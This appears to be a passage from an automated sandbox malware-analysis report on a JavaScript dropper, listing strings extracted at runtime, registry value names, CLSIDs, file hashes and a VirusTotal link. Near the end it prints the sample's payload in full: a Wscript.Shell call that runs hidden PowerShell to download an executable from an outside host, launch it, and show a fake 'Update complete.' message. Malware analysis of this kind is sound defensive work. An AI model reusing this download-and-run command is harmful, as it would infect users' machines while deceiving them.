Unicode based on Runtime Data (wscript.exe )
HideOnDesktopPerUser
Unicode based on Runtime Data (wscript.exe )
IconsOnly
Unicode based on Runtime Data (wscript.exe )
IgnoreUserSettings
Unicode based on Runtime Data (wscript.exe )
Image Path
Unicode based on Runtime Data (wscript.exe )
InitFolderHandler
Unicode based on Runtime Data (wscript.exe )
InprocServer32
Unicode based on Runtime Data (wscript.exe )
IntranetName
Unicode based on Runtime Data (wscript.exe )
IsShortcut
Unicode based on Runtime Data (wscript.exe )
LdapClientIntegrity
Unicode based on Runtime Data (wscript.exe )
LoadAppInit_DLLs
Unicode based on Runtime Data (wscript.exe )
LoadWithoutCOM
Unicode based on Runtime Data (wscript.exe )
LocalizedName
Unicode based on Runtime Data (wscript.exe )
LocalRedirectOnly
Unicode based on Runtime Data (wscript.exe )
LogFileName
Unicode based on Runtime Data (wscript.exe )
LogSecuritySuccesses
Unicode based on Runtime Data (wscript.exe )
MachineGuid
Unicode based on Runtime Data (wscript.exe )
MachinePreferredUILanguages
Unicode based on Runtime Data (wscript.exe )
MachineThrottling
Unicode based on Runtime Data (wscript.exe )
MapNetDriveVerbs
Unicode based on Runtime Data (wscript.exe )
MapNetDrvBtn
Unicode based on Runtime Data (wscript.exe )
MartaExtension
Unicode based on Runtime Data (wscript.exe )
MaximizeApps
Unicode based on Runtime Data (wscript.exe )
MaxRpcSize
Unicode based on Runtime Data (wscript.exe )
MaxSxSHashCount
Unicode based on Runtime Data (wscript.exe )
NdrOleExtDLL
Unicode based on Runtime Data (wscript.exe )
NeverShowExt
Unicode based on Runtime Data (wscript.exe )
NoFileFolderJunction
Unicode based on Runtime Data (wscript.exe )
NoNetCrawling
Unicode based on Runtime Data (wscript.exe )
NoWorkingDirectory
Unicode based on Runtime Data (wscript.exe )
OOBEInProgress
Unicode based on Runtime Data (wscript.exe )
PageAllocatorSystemHeapIsPrivate
Unicode based on Runtime Data (wscript.exe )
PageAllocatorUseSystemHeap
Unicode based on Runtime Data (wscript.exe )
ParentFolder
Unicode based on Runtime Data (wscript.exe )
ParsingName
Unicode based on Runtime Data (wscript.exe )
PinToNameSpaceTree
Unicode based on Runtime Data (wscript.exe )
PolicyScope
Unicode based on Runtime Data (wscript.exe )
PowerShell"*
Unicode based on Runtime Data (wscript.exe )
PowerShell.exe
Unicode based on Runtime Data (wscript.exe )
PreCreate
Unicode based on Runtime Data (wscript.exe )
PreferExternalManifest
Unicode based on Runtime Data (wscript.exe )
PreferredUILanguages
Unicode based on Runtime Data (wscript.exe )
PrivateKeyLifetimeSeconds
Unicode based on Runtime Data (wscript.exe )
PrivKeyCacheMaxItems
Unicode based on Runtime Data (wscript.exe )
PrivKeyCachePurgeIntervalSeconds
Unicode based on Runtime Data (wscript.exe )
ProfileImagePath
Unicode based on Runtime Data (wscript.exe )
ProxyBypass
Unicode based on Runtime Data (wscript.exe )
PublishExpandedPath
Unicode based on Runtime Data (wscript.exe )
QueryForInfoTip
Unicode based on Runtime Data (wscript.exe )
QueryForOverlay
Unicode based on Runtime Data (wscript.exe )
RelativePath
Unicode based on Runtime Data (wscript.exe )
RemoteRpcDll
Unicode based on Runtime Data (wscript.exe )
RestrictedAttributes
Unicode based on Runtime Data (wscript.exe )
RuleCount
Unicode based on Runtime Data (wscript.exe )
SafeDllSearchMode
Unicode based on Runtime Data (wscript.exe )
SafeProcessSearchMode
Unicode based on Runtime Data (wscript.exe )
SaferFlags
Unicode based on Runtime Data (wscript.exe )
Safety Warning Level
Unicode based on Runtime Data (wscript.exe )
Security_HKLM_only
Unicode based on Runtime Data (wscript.exe )
SeparateProcess
Unicode based on Runtime Data (wscript.exe )
SetWorkingDirectoryFromTarget
Unicode based on Runtime Data (wscript.exe )
ShellState
Unicode based on Runtime Data (wscript.exe )
ShowCompColor
Unicode based on Runtime Data (wscript.exe )
ShowInfoTip
Unicode based on Runtime Data (wscript.exe )
ShowSuperHidden
Unicode based on Runtime Data (wscript.exe )
ShowTypeOverlay
Unicode based on Runtime Data (wscript.exe )
SourcePath
Unicode based on Runtime Data (wscript.exe )
SpecialFoldersCacheSize
Unicode based on Runtime Data (wscript.exe )
StreamResource
Unicode based on Runtime Data (wscript.exe )
StreamResourceType
Unicode based on Runtime Data (wscript.exe )
SuppressionPolicy
Unicode based on Runtime Data (wscript.exe )
SystemSetupInProgress
Unicode based on Runtime Data (wscript.exe )
ThemeApiConnectionRequest
Unicode based on Runtime Data (wscript.exe )
ThreadingModel
Unicode based on Runtime Data (wscript.exe )
TransparentEnabled
Unicode based on Runtime Data (wscript.exe )
TrustPolicy
Unicode based on Runtime Data (wscript.exe )
UNCAsIntranet
Unicode based on Runtime Data (wscript.exe )
UseDropHandler
Unicode based on Runtime Data (wscript.exe )
UseHostnameAsAlias
Unicode based on Runtime Data (wscript.exe )
UseOldHostResolutionOrder
Unicode based on Runtime Data (wscript.exe )
UseWINSAFER
Unicode based on Runtime Data (wscript.exe )
WantsAliasedNotifications
Unicode based on Runtime Data (wscript.exe )
WantsFORDISPLAY
Unicode based on Runtime Data (wscript.exe )
WantsFORPARSING
Unicode based on Runtime Data (wscript.exe )
WantsParseDisplayName
Unicode based on Runtime Data (wscript.exe )
WantsUniversalDelegate
Unicode based on Runtime Data (wscript.exe )
WindowsPowerShell
Unicode based on Runtime Data (wscript.exe )
WScript.exe
Unicode based on Runtime Data (wscript.exe )
{031E4825-7B94-4DC3-B131-E946B44C8DD5}
Unicode based on Runtime Data (wscript.exe )
{04731B67-D933-450A-90E6-4ACD2E9408FE}
Unicode based on Runtime Data (wscript.exe )
{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
Unicode based on Runtime Data (wscript.exe )
{11016101-E366-4D22-BC06-4ADA335C892B}
Unicode based on Runtime Data (wscript.exe )
{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}
Unicode based on Runtime Data (wscript.exe )
{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
Unicode based on Runtime Data (wscript.exe )
{208D2C60-3AEA-1069-A2D7-08002B30309D}
Unicode based on Runtime Data (wscript.exe )
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Unicode based on Runtime Data (wscript.exe )
{26EE0668-A00A-44D7-9371-BEB064C98683}
Unicode based on Runtime Data (wscript.exe )
{4336A54D-038B-4685-AB02-99BB52D3FB8B}
Unicode based on Runtime Data (wscript.exe )
{450D8FBA-AD25-11D0-98A8-0800361B1103}
Unicode based on Runtime Data (wscript.exe )
{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
Unicode based on Runtime Data (wscript.exe )
{59031A47-3F72-44A7-89C5-5595FE6B30EE}
Unicode based on Runtime Data (wscript.exe )
{645FF040-5081-101B-9F08-00AA002F954E}
Unicode based on Runtime Data (wscript.exe )
{871C5380-42A0-1069-A2EA-08002B30309D}
Unicode based on Runtime Data (wscript.exe )
{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
Unicode based on Runtime Data (wscript.exe )
{89D83576-6BD1-4C86-9454-BEB04E94C819}
Unicode based on Runtime Data (wscript.exe )
{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}
Unicode based on Runtime Data (wscript.exe )
{9343812E-1C37-4A49-A12E-4B2D810D956B}
Unicode based on Runtime Data (wscript.exe )
{98D99750-0B8A-4C59-9151-589053683D73}
Unicode based on Runtime Data (wscript.exe )
{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}
Unicode based on Runtime Data (wscript.exe )
{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}
Unicode based on Runtime Data (wscript.exe )
{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}
Unicode based on Runtime Data (wscript.exe )
{E345F35F-9397-435C-8F95-4E922C26259E}
Unicode based on Runtime Data (wscript.exe )
{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
Unicode based on Runtime Data (wscript.exe )
{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
Unicode based on Runtime Data (wscript.exe )
{F3F5824C-AD58-4728-AF59-A1EBE3392799}
Unicode based on Runtime Data (wscript.exe )
-WindowStyle Hidden $d=$env:temp+'\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)
Ansi based on Process Commandline (powershell.exe)
_,,,,qJ,,,
Ansi based on Image Processing (screen_0.png)
__,,q?___m,_,_,_q,_??_??_v?_,?,,
Ansi based on Image Processing (screen_0.png)
a = new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)", 0, false);
Ansi based on Memory/File Scan (0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f)
a=new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
Ansi based on Hybrid Analysis (0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f.js.bin)

Extracted Files

  • Informative 1

    • U35A9ZJJNQNW4QIIY9TP.temp
      Size
      7.8KiB (8016 bytes)
      Type
      data
      Runtime Process
      powershell.exe (PID: 2780)
      MD5
      d0dd64c23437e70a885ade12b5fef6d0 Copy MD5 to clipboard
      SHA1
      34ec91a8d43810a833cd4bed385fc44d7a968914 Copy SHA1 to clipboard
      SHA256
      c756948173fac26e5da3da10f1f5d0a0ba789b3fc02fb46de15d51177b1a3213 Copy SHA256 to clipboard

Notifications

  • Runtime

  • Sample was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f/analysis/1469116037/")

Community